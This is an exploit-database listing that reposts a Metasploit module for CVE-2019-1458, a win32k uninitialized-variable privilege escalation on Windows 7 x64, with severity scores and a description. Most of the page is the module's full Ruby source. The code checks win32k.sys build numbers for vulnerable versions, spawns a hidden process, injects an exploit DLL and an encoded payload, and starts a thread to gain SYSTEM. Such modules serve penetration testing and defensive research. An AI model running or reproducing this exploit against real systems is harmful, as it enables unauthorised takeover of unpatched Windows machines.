Lucene search

Metasploit1337DAY-ID-35039

HistoryOct 15, 2020 - 12:00 a.m.

Microsoft Windows Uninitialized Variable Local Privilege Escalation Exploit

2020-10-1500:00:00

metasploit

0day.today

metasploit module

cve-2019-1458

pointer dereference vulnerability

win32k

uninitialized variable

kernel memory

arbitrary code execution

system user

windows 7

reboot

exploit code.

CVSS2

7.2

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

8.5

Confidence

High

EPSS

0.971

Percentile

99.8%

JSON

This Metasploit module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitialized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/file'
require 'msf/core/exploit/exe'
require 'msf/core/post/windows/priv'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
        update_info(
          info,
          'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',
          'Description' => %q{
          This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability
          within win32k which occurs due to an uninitalized variable, which allows user mode attackers
          to write a limited amount of controlled data to an attacker controlled address
          in kernel memory. By utilizing this vulnerability to execute controlled writes
          to kernel memory, an attacker can gain arbitrary code execution
          as the SYSTEM user.

          This module has been tested against Windows 7 x64 SP1. Offsets within the
          exploit code may need to be adjusted to work with other versions of Windows.
          The exploit can only be triggered once against the target and can cause the
          target machine to reboot when the session is terminated.
          },
          'License' => MSF_LICENSE,
          'Author' =>
              [
                'piotrflorczyk', # poc
                'unamer', # exploit
                'timwr', # msf module
              ],
          'Platform' => 'win',
          'SessionTypes' => ['meterpreter'],
          'Targets' =>
              [
                ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
              ],
          'Notes' =>
              {
                'Stability' => [ CRASH_OS_RESTARTS ],
                'Reliability' => [ UNRELIABLE_SESSION ]
              },
          'References' =>
              [
                ['CVE', '2019-1458'],
                ['URL', 'https://github.com/unamer/CVE-2019-1458'],
                ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],
                ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],
                ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']
              ],
          'DisclosureDate' => '2019-12-10',
          'DefaultTarget' => 0,
          'AKA' => [ 'WizardOpium' ]
        )
    )
    register_options([
      OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])
    ])
  end

  def setup_process
    process_name = datastore['PROCESS']
    begin
      print_status("Launching #{process_name} to host the exploit...")
      launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
      process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes could not allow to create a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end
    process
  end

  def check
    sysinfo_value = sysinfo['OS']

    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return CheckCode::Safe
    end

    file_path = expand_path('%WINDIR%\\system32\\win32k.sys')
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    build_num_gemversion = Gem::Version.new("#{major}.#{minor}.#{build}.#{revision}")

    # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/
    if (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607
      return CheckCode::Appears
    else
      return CheckCode::Safe
    end
  end

  def exploit
    super

    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] != ARCH_X64
      fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')
    end

    process = setup_process
    library_data = exploit_data('CVE-2019-1458', 'exploit.dll')
    print_status("Injecting exploit into #{process.pid} ...")
    exploit_mem, offset = inject_dll_data_into_process(process, library_data)
    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    encoded_payload = payload.encoded
    payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)
  end
end